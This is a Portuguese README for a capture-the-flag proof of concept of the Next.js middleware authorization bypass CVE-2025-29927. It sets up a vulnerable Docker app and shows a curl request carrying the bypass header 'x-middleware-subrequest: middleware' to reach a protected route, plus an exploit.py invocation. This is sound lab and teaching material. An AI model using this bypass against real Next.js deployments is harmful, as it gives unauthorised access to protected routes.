
Prova de conceito estilo CTF demonstrando o bypass de autorização de middleware do Next.js CVE-2025-29927. Inclui aplicativo Docker vulnerável e script de exploit para recuperar a flag de rota protegida.
Este é um Proof of Concept (PoC) no estilo Capture The Flag (CTF) para a vulnerabilidade Bypass de Autorização no Middleware do Next.js (CVE-2025-29927). O objetivo é contornar o middleware de autenticação e recuperar a flag da rota /protected.
/protected/git clone https://github.com/mhamzakhattak/CVE-2025-29927
cd CVE-2025-29927
cd nextjs-docker
sudo docker build -t nextjs-auth-app .
sudo docker run -p 3000:3000 nextjs-auth-app
Isso iniciará o aplicativo Next.js vulnerável em http://IP:3000
Tente acessar:
curl -i http://IP:3000/protected
Você será redirecionado para /.
curl -H "x-middleware-subrequest: middleware" http://IP:3000/protected
Use o exploit.py fornecido para contornar o middleware e acessar a rota protegida:
python3 exploit.py -url http://IP:3000
Se for bem-sucedido, você recuperará a flag de /protected.
Dockerfile - Constrói o aplicativo Next.js vulnerávelexploit.py - Explora a vulnerabilidade para contornar a autenticaçãopages/ - Contém as rotas vulneráveis /protected e /loginmiddleware.js - A lógica do middleware vulnerávelREADME.md - Este arquivoEste PoC é apenas para fins educacionais e de pesquisa. Não o utilize contra sistemas que você não possui ou para os quais não tem permissão explícita de teste.
Encontre a flag explorando a vulnerabilidade e acessando:
http://IP:3000/protected
Boa sorte! 🏴☠️